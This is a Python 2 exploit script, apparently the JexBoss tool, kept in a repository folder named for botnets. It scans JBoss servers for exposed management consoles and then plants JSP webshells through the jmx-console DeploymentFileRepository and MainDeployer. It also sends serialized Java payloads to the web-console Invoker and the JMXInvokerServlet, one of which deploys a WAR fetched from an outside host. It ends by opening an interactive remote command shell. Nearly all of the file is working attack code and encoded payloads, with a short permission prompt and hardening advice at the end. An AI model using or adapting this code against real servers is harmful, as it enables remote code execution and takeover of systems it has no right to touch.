Path: blob/master/Botnets/Exploits/JBOSS FULL/exploit.py
5038 views
import httplib, sys, urllib, os, time1from urllib import urlencode23RED = '\x1b[91m'4RED1 = '\033[31m'5BLUE = '\033[94m'6GREEN = '\033[32m'7BOLD = '\033[1m'8NORMAL = '\033[0m'9ENDC = '\033[0m'1011def getHost(url):12tokens = url.split("://")13if len(tokens) == 2: #foi fornecido protocolo14return tokens[1].split(":")[0]15else:16return tokens.split(":")[0]1718def getProtocol(url):19tokens = url.split("://")20if tokens[0] == "https":21return "https"22else:23return "http"2425def getPort(url):26token = url[6:].split(":")27if len(token) == 2:28return token[1]29elif getProtocol(url) == "https":30return 44331else:32return 803334def getConnection(url):35if getProtocol(url) == "https":36return httplib.HTTPSConnection(getHost(url), getPort(url))37else:38return httplib.HTTPConnection(getHost(url), getPort(url))394041def getSuccessfully(url, path):42result = 40443time.sleep(5)44conn = getConnection(url)45conn.request("GET", path)46result = conn.getresponse().status47if result == 404:48conn.close()49time.sleep(7)50conn = getConnection(url)51conn.request("GET", path)52result = conn.getresponse().status53conn.close()54return result5556def checkVul(url):5758print ( GREEN +" ** Checking Host: %s **\n" %url )5960path = { "jmx-console" : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",61"web-console" : "/web-console/ServerInfo.jsp",62"JMXInvokerServlet" : "/invoker/JMXInvokerServlet"}6364for i in path.keys():65try:66print GREEN + " * Checking %s: \t" %i + ENDC,67conn = getConnection(url)68conn.request("HEAD", path[i])69path[i] = conn.getresponse().status70if path[i] == 200 or path[i] == 500:71print RED + "[ VULNERABLE ]" + ENDC72else: print GREEN + "[ SAFE ]"73conn.close()74except:75print RED + "\n * An error ocurred while connecting to the host %s\n" %url + ENDC76path[i] = 5057778return path7980def autoExploit(url, type):8182# exploitJmxConsoleFileRepository: tested and working in jboss 4 and 583# exploitJmxConsoleMainDeploy: tested and working in jboss 4 and 684# exploitWebConsoleInvoker: tested and working in jboss 485# exploitJMXInvokerFileRepository: tested and working in jboss 4 and 58687print GREEN + ("\n * Exploiting %s. Wait...\n" %url)88result = 50589if type == "jmx-console":90result = exploitJmxConsoleFileRepository(url)91if result != 200 and result != 500:92result = exploitJmxConsoleMainDeploy(url)93elif type == "web-console":94result = exploitWebConsoleInvoker(url)95elif type == "JMXInvokerServlet":96result = exploitJMXInvokerFileRepository(url)9798if result == 200 or result == 500:99print GREEN + " * Successfully Exploiting! Starting Admin Command Shell...\n" + ENDC100shell_http(url, type)101else:102print (RED + "\n * Target \n"103" Waiting for 7 seconds...\n "+ ENDC)104time.sleep(7)105106def shell_http(url, type):107if type == "jmx-console" or type == "web-console":108path = '/jbossass/jbossass.jsp?'109elif type == "JMXInvokerServlet":110path = '/shellinvoker/shellinvoker.jsp?'111112conn = getConnection(url)113conn.request("GET", path)114conn.close()115time.sleep(7)116resp = ""117#clear()118print " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - * \n"119print RED+" * "+url+": \n"+ENDC120headers = {"User-Agent" : "jexboss"}121for cmd in ['uname -a', 'cat /etc/issue', 'id']:122conn = getConnection(url)123cmd = urlencode({"ppp": cmd})124conn.request("GET", path+cmd, '', headers)125resp += " "+conn.getresponse().read().split(">")[1]126print resp,127128while 1:129print BLUE + "[Type commands or \"exit\" to finish]"130cmd=raw_input("Shell> "+ENDC)131#print ENDC132if cmd == "exit":133break134conn = getConnection(url)135cmd = urlencode({"ppp": cmd})136conn.request("GET", path+cmd, '', headers)137resp = conn.getresponse()138if resp.status == 404:139print RED+ " * Error contacting the commando shell. Try again later..."140conn.close()141continue142stdout = ""143try:144stdout = resp.read().split("pre>")[1]145except:146print RED+ " * Error contacting the commando shell. Try again later..."147if stdout.count("An exception occurred processing JSP page") == 1:148print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC149else: print stdout,150conn.close()151152def exploitJmxConsoleMainDeploy(url):153# MainDeployer154# does not work in jboss5 (bug in jboss5)155# shell in link156# /jmx-console/HtmlAdaptor157jsp = "http://www.joaomatosf.com/rnp/jbossass.war"158payload =( "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service"159"=MainDeployer&methodIndex=19&arg0="+jsp)160print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell "161"\n available on: "+jsp +ENDC)162conn = getConnection(url)163conn.request("HEAD", payload)164result = conn.getresponse().status165conn.close()166return getSuccessfully(url, "/jbossass/jbossass.jsp")167168def exploitJmxConsoleFileRepository(url):169# DeploymentFileRepository170# tested and work in jboss4, 5.171# doest not work in jboss6172# shell jsp173# /jmx-console/HtmlAdaptor174jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61"175"%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C"176"%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"177"%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20"178"%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65"179"%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71"180"%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72"181"%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74"182"%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73"183"%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29"184"%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69"185"%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65"186"%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29"187"%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E"188"%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64"189"%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70"190"%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20"191"%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" )192193payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="194"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="195"jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St"196"ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True")197198conn = getConnection(url)199conn.request("HEAD", payload)200result = conn.getresponse().status201conn.close()202return getSuccessfully(url, "/jbossass/jbossass.jsp")203204def exploitJMXInvokerFileRepository(url):205# tested and work in jboss4, 5206# MainDeploy, shell in data207# /invoker/JMXInvokerServlet208payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"209"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"210"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"211"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"212"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"213"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"214"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"215"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"216"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"217"\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"218"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"219"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"220"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"221"\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"222"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"223"\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"224"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"225"\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"226"\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"227"\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"228"\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"229"\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"230"\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"231"\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"232"\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"233"\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"234"\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"235"\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"236"\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"237"\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"238"\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"239"\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"240"\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"241"\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"242"\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"243"\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"244"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"245"\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"246"\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"247"\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"248"\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"249"\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"250"\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"251"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"252"\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"253"\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"254"\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"255"\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"256"\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"257"\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"258"\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"259"\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"260"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"261"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"262"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"263"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"264"\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"265"\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"266"\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"267"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"268"\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"269"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"270"\x00\x04\x70\x78")271conn = getConnection(url)272headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",273"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}274conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers)275response = conn.getresponse()276result = response.status277if result == 401:278print " Retrying..."279conn.close()280conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers)281response = conn.getresponse()282result = response.status283if response.read().count("Failed") > 0:284result = 505285conn.close286return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp")287288def exploitWebConsoleInvoker(url):289# does not work in jboss5 (bug in jboss5)290# MainDeploy, shell in link291# /web-console/Invoker292#jsp = "http://www.joaomatosf.com/rnp/jbossass.war"293#jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp)294#jsp = "\\x" + jsp295payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e"296"\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65"297"\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e"298"\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae"299"\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61"300"\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f"301"\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73"302"\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f"303"\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75"304"\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"305"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65"306"\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a"307"\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f"308"\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06"309"\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61"310"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58"311"\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"312"\x2a"313#link314"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61"315"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f"316"\x73\x73\x61\x73\x73\x2e\x77\x61\x72"317#end318"\x75\x72\x00\x13\x5b"319"\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e"320"\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"321"\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e"322"\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e"323"\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63"324"\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00"325"\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"326"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65"327"\x70\x6c\x6f\x79\x65\x72\x78")328conn = getConnection(url)329headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",330"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}331conn.request("POST", "/web-console/Invoker", payload, headers)332response = conn.getresponse()333result = response.status334if result == 401:335print " Retrying..."336conn.close()337conn.request("HEAD", "/web-console/Invoker", payload, headers)338response = conn.getresponse()339result = response.status340conn.close341return getSuccessfully(url, "/jbossass/jbossass.jsp")342343344def clear():345if os.name == 'posix':346os.system('clear')347elif os.name == ('ce', 'nt', 'dos'):348os.system('cls')349350def checkArgs(args):351if len(args) < 2 or args[1].count('.') < 1:352return 1,"You must provide the host name or IP address you want to test."353elif len(args[1].split('://')) == 1:354return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1])355elif args[1].count('http') == 1 and args[1].count('.') > 1:356return 0, ""357else:358return 1, 'Invalid parameter'359360# check python version361if sys.version_info[0] == 3:362print (RED + "\n * Not compatible with version 3 of python.\n"363" Please run it with version 2.7 or lower.\n\n"364+BLUE+" * Example:\n"365" python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC )366sys.exit(1)367368# check Args369status, message = checkArgs(sys.argv)370if status == 0:371url = sys.argv[1]372elif status == 1:373print RED + "\n * Error: %s" %message374print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC375sys.exit(status)376elif status == 2:377url = ''.join(['http://',sys.argv[1]])378379# check vulnerabilities380mapResult = checkVul(url)381382# performs exploitation383for i in ["jmx-console", "web-console", "JMXInvokerServlet"]:384if mapResult[i] == 200 or mapResult[i] == 500:385print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n"386" This operation will provide a simple command shell to execute commands on the server..\n"387+RED+" Continue only if you have permission!" +ENDC)388if raw_input(" yes/NO ? ").lower() == "yes":389autoExploit(url, i)390391# resume results392if mapResult.values().count(200) > 0:393banner()394print RED+ " Results: potentially compromised server!" +ENDC395print (GREEN+" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n"396" Recommendations: \n"397" - Remove web consoles and services that are not used, eg:\n"398" $ rm web-console.war\n"399" $ rm http-invoker.sar\n"400" $ rm jmx-console.war\n"401" $ rm jmx-invoker-adaptor-server.sar\n"402" $ rm admin-console.war\n"403" - Use a reverse proxy (eg. nginx, apache, f5)\n"404" - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"405" - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n"406" References:\n"407" [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"408" [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"409"\n"410" - If possible, discard this server!\n\n"411" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" )412elif mapResult.values().count(505) == 0:413print ( GREEN+ "\n\n * Results: \n"414" The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)415416417